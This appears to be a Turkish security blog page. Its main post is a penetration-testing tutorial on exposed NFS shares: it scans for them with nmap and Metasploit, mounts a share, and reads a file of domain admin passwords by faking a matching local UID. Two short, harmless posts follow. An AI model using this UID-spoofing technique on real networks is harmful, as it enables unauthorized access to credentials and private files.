3 Temmuz 2015 Cuma

Network Sistemlerinde Bulunan NFS Zafiyeti ve Tespiti

Standard

NFS Tespiti ve Zafiyeti

Arkadaşlar bugün Nfs sisteminde bulunan çoğu zaman hackerlar tarafından krtik bilgilerin ele geçirildiği zafiyetten bahsedeceğim.

Kısaca NFS (Network File System) Nedir ?

  • UNIX'in doğal dosya paylaşım sistemidir.
  • Yerel bir ağda, birbirine bağlı Linux sistemlerin, aralarında  dosya paylaşımını sağlayan bir teknolojidir.
  • Üzerindeki dosya sisteminin  tamamını veya bir bölümünü yerel ağ üzerindeki  diğer makinelerin paylaşımına açar.
  • 2049/TCP portunda çalışır.

NFS Zafiyeti Oluşumu

Network sızma testi yapılan firmaların bir çoğunda dosya paylaşımında bir çok veri elde edilir. Biz şimdi bu paylaşımın açık olduğunu düşündüğümüz bir sistemi tespit edelim.

Kullanılan Araçlar

  • Nmap
  • Metasploit

Nmap İle Network'te NFS Servisi Tespiti

nmap -n -PN -sS -T5 -p 2049 --script=nfs-showmount  GATEWAY-ADRESİ/İP-BLOĞU

Metasploit ile Network'te NFS Servisi Tespiti

msf > use auxiliary/scanner/nfs/nfsmount
msf auxiliary(nfsmount) > set RHOSTS GATEWAY-ADRESİ/İP-BLOĞU
msf auxiliary(nfsmount) > run
Tespit edilen paylaşımlar yerel sisteme nasıl bağlanır ?

#mount -t nfs 192.168.0.1:/export/home /home/user/Desktop/baglama_dizini


Evet paylaşımı yerel sistemde Masaüstüne bağladık. Şimdi terminalde paylaşımda bulunulan argümanları ve hangi UID değeri sahip bir kullanıcıya ait olduğunu görelim.

-rwxr----- 1923 1000 1898 domainAdminveSifreleri.doc


Paylaşıma açık olan klasörde kritik bilgilerin olduğu görüyoruz. Fakat bu doc dosyasını yetkili kullanıcı UID değerine sahip bir kullanıcı ile acmamız gerekebilir. Öncelikle mount ettiğimiz bağı unmount komutuyla çözelim. Daha sonra  yerel sistemde aynı UID değere sahip olan bir kullanıcı acalım.

# umount /baglama_dizini


Evet bağımızı başarıyla çözdük. Şimdi aynı UID değere sahip kullanıcı acalım.

# useradd deneme


Kullanıcımızı açtık sıra geldi UID değerimizi vermeye.

# usermod -u 1923 deneme


UID değerimizi verdikten sonra tekrar paylaşımı yerel sisteme bağlayalım.

#mount -t nfs 192.168.0.1:/export/home /home/user/Desktop/baglama_dizini



Evet artık kritik bilgiye sahip domainAdminveSifreleri.doc adlı dosyamızı başarılı bir şekilde okuyabiliriz.



Etiketler: , , , , , , , , , , , , , , ,

VMware Workstation "kernel header path is not valid" hatası - Çözümü

Standard
VMware tool kurulumu yapılırken genellikle bu sorunla karşılaşıyoruz. Kısa ve pratik olarak aşağıda vermiş olduğum komutları terminalde çalıştırırsanız sorununuz çözülecektir.

Öncelikle Kernel sürümümüzü öğrenelim.



1- Terminale Aşağıdaki Komutu Yazın

 uname -r 

Benim kernel sürümüm : 3.18.0-kali3-amd64  olarak çıktı.Sizde farklı olabilir.
Şimdi bu bir kenarda dursun.

2- Terminale Aşağıdaki Komutu Yazın
 sudo apt-get update && sudo apt-get install build-essential linux-headers-3.18.0-kali3-amd64(Benim Kernel Sürümümü Yazdım. Siz Kendi Kernel Sürümünüzü Yazınız)

Evet Artık kaldığınız yerden devam edebilirsiniz.

Etiketler: , , , , , , ,

30 Haziran 2015 Salı

İlk Blog Yazım | Tasarım Aşamasında (:

Standard
Godaddy domain servisinden 2,20 TL'ye aldığım domainimi blogspota bağladım biraz tasarım yaptım falan derken siteyi açmış bulundum.

Bloğumda daha çok güvenlik konularına yer vermeyi düşünüyorum. Yazılarımda görüşmek üzere (:

Not: godaddy'den 2,20TL ye domain almak isteyen arkadaşlarım google.com'da "godaddy" ( ve yanına herhangi bir rakam yazsın ) Reklamı direk karşınıza çıkacaktır.



Etiketler: , , , , ,